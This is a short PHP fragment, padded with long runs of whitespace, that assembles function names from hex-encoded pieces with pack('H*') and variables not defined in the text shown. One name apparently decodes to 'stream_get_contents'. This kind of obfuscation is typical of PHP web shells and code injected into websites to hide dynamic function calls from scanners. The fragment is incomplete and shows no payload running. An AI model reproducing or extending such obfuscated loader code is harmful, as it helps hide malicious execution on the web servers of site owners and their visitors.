<?php																																										
																																										
 
$rindex6 = pack("H*", $constant2.'74'.'72'.'65'.$constant12.$constant4.$constant7.'67'.$constant3.$constant13.$constant7.'63'.'6f'.$constant14.$constant13.'65'.'6e'.$constant13.$constant2);
$rindex7 = pack("H*", '70'.$constant15.$constant6.$constant11.$constant2.$constant3);

